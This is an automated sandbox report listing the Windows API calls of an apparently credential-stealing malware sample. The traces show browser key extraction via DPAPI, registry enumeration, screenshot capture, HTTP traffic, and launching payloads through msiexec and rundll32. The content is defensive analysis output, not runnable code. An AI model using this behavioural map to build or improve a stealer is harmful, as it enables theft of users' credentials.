                                          • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D5E5F
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • InternetCloseHandle.WININET(00000000), ref: 022D622E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                          • String ID:
                                          • API String ID: 1703137719-0
                                          • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                          • Instruction ID: a9242f6e855a41c5ae0169ec2983eb5f566070e44f36976ba87d8ea55160db85
                                          • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                          • Instruction Fuzzy Hash: 4F12BA71960328AACF15EBE4DD95EEEB37ABF64700F804199A10762194EF742B88DF50
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0097B270,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                          • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                          • StrStrA.SHLWAPI(?,0097B2B8,00420B52), ref: 0040CAF7
                                          • StrStrA.SHLWAPI(00000000,0097B2D0), ref: 0040CB1E
                                          • StrStrA.SHLWAPI(?,0097B940,00000000,?,00421458,00000000,?,00000000,00000000,?,00978328,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                          • StrStrA.SHLWAPI(00000000,0097BCA0), ref: 0040CCB9
                                            • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                            • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00978448), ref: 0040C871
                                            • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                            • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                          • StrStrA.SHLWAPI(?,0097BCA0,00000000,?,0042145C,00000000,?,00000000,00978448), ref: 0040CD5A
                                          • StrStrA.SHLWAPI(00000000,00978618), ref: 0040CD71
                                            • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                            • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                            • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                          • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                          • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                          • String ID:
                                          • API String ID: 3555725114-3916222277
                                          • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                          • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                          • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                          • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022DCCD3
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022DCCF0
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 022DCCFC
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022DCD0F
                                          • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022DCD1C
                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022DCD40
                                          • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022DCD5E
                                          • StrStrA.SHLWAPI(00000000,0064A364), ref: 022DCD85
                                          • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022DCF09
                                          • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022DCF20
                                            • Part of subcall function 022DCA87: memset.MSVCRT ref: 022DCABA
                                            • Part of subcall function 022DCA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                            • Part of subcall function 022DCA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                            • Part of subcall function 022DCA87: memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                          • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022DCFC1
                                          • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022DCFD8
                                            • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                            • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                            • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                          • lstrlen.KERNEL32(00000000), ref: 022DD0AB
                                          • CloseHandle.KERNEL32(00000000), ref: 022DD103
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                          • String ID:
                                          • API String ID: 3555725114-3916222277
                                          • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                          • Instruction ID: 7a30f4c0399331f6f53a97a7d2ae2789a9cc34d3b0ed18b9c76773a63c979b17
                                          • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                          • Instruction Fuzzy Hash: 64E1EC76920308ABCF14EBE4DD95EEEB77AAF64300F404159F107A6194EF346A89DF60
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • RegOpenKeyExA.ADVAPI32(00000000,00979200,00000000,00020019,00000000,004205B6), ref: 004183A4
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                          • wsprintfA.USER32 ref: 00418459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                                          • String ID: - $%s\%s$?
                                          • API String ID: 3246050789-3278919252
                                          • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                          • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                          • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                          • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • memset.MSVCRT ref: 00410C1C
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                          • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                          • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                          • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                          • lstrlenA.KERNEL32(?), ref: 00410CA7
                                          • memset.MSVCRT ref: 00410CCD
                                          • memset.MSVCRT ref: 00410CE1
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00946070,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                          • String ID: .exe
                                          • API String ID: 1395395982-4119554291
                                          • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                          • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                          • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                          • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateGlobalStream
                                          • String ID: image/jpeg
                                          • API String ID: 2244384528-3785015651
                                          • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                          • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                          • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                          • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                          APIs
                                          • strtok_s.MSVCRT ref: 00411307
                                          • strtok_s.MSVCRT ref: 00411750
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00946070,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 348468850-0
                                          • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                          • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                          • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                          • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell$lstrcpy
                                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                          • API String ID: 2507796910-3625054190
                                          • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                          • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                          • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                          • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                          APIs
                                          • memset.MSVCRT ref: 0041429E
                                          • memset.MSVCRT ref: 004142B5
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                          • lstrcatA.KERNEL32(?,0097B750), ref: 0041430B
                                          • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                          • lstrcatA.KERNEL32(?,0097B678), ref: 00414333
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                            • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                            • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                          • StrStrA.SHLWAPI(?,0097C6A0), ref: 004143F3
                                          • GlobalFree.KERNEL32(?), ref: 00414512
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                          • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                          • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                          • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                          • String ID:
                                          • API String ID: 1191620704-0
                                          • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                          • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                          • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                          • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                          APIs
                                          • memset.MSVCRT ref: 022E4505
                                          • memset.MSVCRT ref: 022E451C
                                            • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E4553
                                          • lstrcat.KERNEL32(?,0064A30C), ref: 022E4572
                                          • lstrcat.KERNEL32(?,?), ref: 022E4586
                                          • lstrcat.KERNEL32(?,0064A5D8), ref: 022E459A
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                            • Part of subcall function 022D9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022D9FA0
                                            • Part of subcall function 022D9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022D9FF9
                                            • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                            • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                            • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                            • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                            • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                            • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                            • Part of subcall function 022E9627: GlobalAlloc.KERNEL32(00000000,022E4644,022E4644), ref: 022E963A
                                          • StrStrA.SHLWAPI(?,0064A0D8), ref: 022E465A
                                          • GlobalFree.KERNEL32(?), ref: 022E4779
                                            • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                            • Part of subcall function 022D9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                            • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                            • Part of subcall function 022D9D27: LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                            • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E470A
                                          • StrCmpCA.SHLWAPI(?,004208D1), ref: 022E4727
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 022E4739
                                          • lstrcat.KERNEL32(00000000,?), ref: 022E474C
                                          • lstrcat.KERNEL32(00000000,00420FB8), ref: 022E475B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                          • String ID:
                                          • API String ID: 1191620704-0
                                          • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                          • Instruction ID: 9f76b99db6c1d1b8667cebf9b2c3c177e82e0d579a2785da4de87d1280749433
                                          • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                          • Instruction Fuzzy Hash: 047151B6910218BBDF14FBE0DC89FEE737AAB49300F408598E60696184EB75D748CF91
                                          APIs
                                          • memset.MSVCRT ref: 00401327
                                            • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                          • lstrlenA.KERNEL32(?), ref: 0040135C
                                          • lstrcatA.KERNEL32(?,.keys), ref: 00401377
